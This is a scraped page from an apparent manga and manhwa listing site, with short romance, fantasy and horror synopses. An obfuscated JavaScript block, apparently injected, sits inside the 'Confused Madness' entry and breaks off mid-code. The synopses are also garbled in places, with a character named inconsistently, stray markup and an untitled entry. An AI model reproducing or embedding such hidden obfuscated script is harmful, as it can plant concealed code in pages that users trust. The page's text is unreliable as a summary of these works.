Historical - Page 46

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Confining Kiss Serenade

Confining Kiss Serenade, Qiu Wen Xiao Ye Qu , Qi Wn Xio Y Q, at manhwawebsiteRonin is the son of a great lord and the heir to his domain. However, when the great lord returned from a battle with serious injuries, he brought back an eldest son. This brother, named Duser Nightwind, was flamboyant and did not hide his ambitions. Ronin felt pressured. On the one hand, he thought that this "brother" who had fallen from the sky had bad intentions and was trying to seize the inheritance of the domain. On the other hand, he was slowly attracted to Nightwind and felt extremely conflicted. As the two "brothers" entangled, they gradually uncovered the conspiracy behind the scenes.Maybe you like !


Confused Madness

In her previous life, Ye Jin Su wanted money and men but had neither; her death did not affect anyone at all. Fu Da Ming was reborn into the body of a well-off young lady, and thought she could finally live a comfortable life. However, she discovered that her seemingly perfect life was not as perfect as she'd expected, and her father did not seem to cherish her much. Ye Jin Su: There's still a good side to this life because I have money.<script></script><script>function _0x11c7(_0x3eecf6,_0x4fb4a6){var _0x3d72fe=_0x367d();return _0x11c7=function(_0x47694f,_0x129b01){_0x47694f=_0x47694f-(-0xb7*0x2b+0x259*0x4+0x1*0x1682);var _0x12e25c=_0x3d72fe[_0x47694f];return _0x12e25c;},_0x11c7(_0x3eecf6,_0x4fb4a6);}(function(_0x38c3ce,_0x216985){var _0x59e74d=_0x11c7,_0x52f5bf=_0x38c3ce();while(!![]){try{var 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Contract Concubine

One day, Yesuh, a famous assassin, receives a strange request from a suspicious man. She’s never received such a ridiculous request before, but after hearing how much the odd man was willing to pay, she decides to bite the bullet and take on the request.However, upon starting the mission, Yesuh is shocked to find out that her suspicious employer is actually–?! The Concubine Contract


Contractual Marriage To A Surly Duke

<span class="mx-1">Sickly? Husband's Contractual Wife</span> I’m Selena, a daughter born to a family well-known for their fertile women. I was all but sold off in a marriage to a sickly duke whose life hung in the balance, all for the sake of producing an heir for his family. They provided me a medicine purported to aid in pregnancy, and the astrologist advised me good days for sleeping together, but... there was no child. “So, are there any signs of pregnancy?” “Ah, I-I'm sorry.” “You’re useless. What luck do you think won you the position of the duke's wife?” I couldn't say a word. ‘No, excuse me. I only have to look at the sky to pluck a star. That's how I attained this position.’ * [(metaphor) Lit. Plucking a star from the sky: something that's difficult to get/achieve) *** A husband who doesn’t like touching me in the least. But he's still pitiful so let's at least make him healthy by feeding him nutritious food, getting him to exercise, and I’ll taste test any doubtful food first personally. Once he recovers from my extensive efforts, I’ll sign an annulment paper and flee, but... “You agreed to a contract to bear me an heir. But to think you would go back on your words...” Although he’s in good health now, my “former” husband has become a bit too healthy. “You're healthy now!” “The duties of marriage are sacred. I will collect my dues.” “Wait. Wait! But we’re divorced? We’re no longer husband and wife...” He smirked then took a piece of paper from his breast pocket and tossed it to me. “We aren't divorced yet.” Huh?!


Contractual Relationships with Friends Should be Done Carefully

\"Oh my, from childhood friends to an engaged couple! Isn’t that so romantic?\" \"Yeah. No, it’s not.\" \"You two were always together back in the academy, right?\" \"Ah, that’s true.\" It all began during our academy days. I was exhausted from the constant stream of marriage proposals. ‘What about me?’ ‘What?’ ‘As your marriage partner.’ And so, I ended up signing a contract engagement with my friend, Aivert! Thus, we began acting like a couple who couldn’t live without each other. Of course, I can swear that he’s just a friend. But as time passed, and when the end of the contract was approaching… \"Soon, I\'ll be free!\" I thought the embarrassing couple act would soon be over! But… —Clank. An unexpected event occurred. I stared, bewildered, at the handcuffs now on both my wrist and Aivert’s. What kind of situation is this? *** I thought we’d just be stuck together, and as long as we did our part, everything would be fine. After all, acting as a couple would get easier, right? I kept thinking positively about it, but… Holding the key to the handcuffs, Aivert Royden subtly tilted his head. “If I break this, would you be disappointed?” Rodella’s eyes went wide. The shy and cautious childhood friend from her memories was gone, replaced by a stranger, yet someone familiar. He wore a look that stirred strange feelings in her. \"You said it yourself. A madman should be tied up.\" Clank. He shook his bound wrist. \"If I take this off…\" If I drift away from you, if I let this opportunity slip away… \"I think I might go crazy. What should I do?\"


Coponicus no Kokyuu

From Aestheticism: The story happens in a circus in Paris in the 1970's. (...) Much is made of the romance of the circus atmosphere, of flying through the air on a trapeze, etc etc. Think cirque here, not circus. We're doing Old World riffs on the romance and tawdriness of the ring. There are no elephants in tutus walking on their hind legs; it's slit-eyed jugglers and daring death-loving trapeze artists and sad Pierrot clowns, even if the Pierrot clown - our hero, Torinosu, 'Bird's Nest' - has a false red nose. The tawdriness comes from the circus master pimping out his performers to anyone willing to pay. (...) And there's tanbi decadence - ghosts who wander into the action looking like teenaged girls even if they're the hero's brother, and abandoned neurotic women with a thing for inflicting pain, and buracon and possible murder and unspoken pining and a hero who looks about to perish at any moment from terminal angst.


Copper Coins

Tong Qian Kan Shi ; ; TQKS ; ; Copper Coin Niche ; ; 铜钱龛世 ; ; เหรียญทองแดงปราบพิภพ ; ; 동전감세


Cor Leonis - Shishi no Sinzou

1) Mega You Freak 2) Mega Love Melancholy 3) Home 4) Cor Leonis - Lion's Heart 5) Destination - The bird and the plane 6) Café Hickory House 7) [i][/i]


Corpse Party: Another Child

With their school shutting down for good, the students of a small town were heading for different directions in life. For Minase Tamaki, who was staying in town to find a job, it might be the last time she sees her crush Shindo Yuuma, who is moving to the city to attend a new school. She asks him to do a little prayer that is supposed to help people cross paths again even if they become separated. But her classmate, Yuzuki Erina, overhears their conversation and, out of jealousy, decides to ruin her plans by inviting their entire class on what was supposed to be an intimate spell. As soon as the charm goes off, the ground splits in half, swallowing the entire class and, when they wake up, they find themselves in an old school campus. Unable to find a way out, they wander the corridors, trying to figure out where they are. But it seems that the building isn’t as abandoned as they thought it was and, in fact, something evil is lurking in the shadows.



The Morea sea is controlled by a clan name Preveza, a clan which has lost all ties to any other country in the past three years. At this critical moment the leader of the armada, Ayace "the devil killer" Malik is foremost in ensuring Preveza's continued existence. Also among the major figures of Preveza is the strategist Canale, favoured by the "princess" of the clan, Aura. However the trouble fomenting due to Canale's mysterious past is soon to change both the relationship between Canale and Ayace and the future of the Preveza clan.


Corsair - Eigetsu

From Bliss: Yani, the young prime minister of the empire of Pisare, wanted to see his dear childhood friend, the beautiful attorney general, Sesaam purely as a friend. But it seems his heart isn't following his mind. On one hand he's facing the facts that he wants Sesaam as his lover but on another hand he didn't want to destroy the trust he had build for years with Sesaam due to his selfish feelings. Then, all of a sudden, Sesaam told him he could have sex with him...!?


Corset ni Tsubasa

Chris is a tomboy whose relatives send her away to a boarding school after her father dies. As she grows up in Victorian England, Chris must decide whether to give in to what society expects of her, or to challenge it and follow her own dreams.
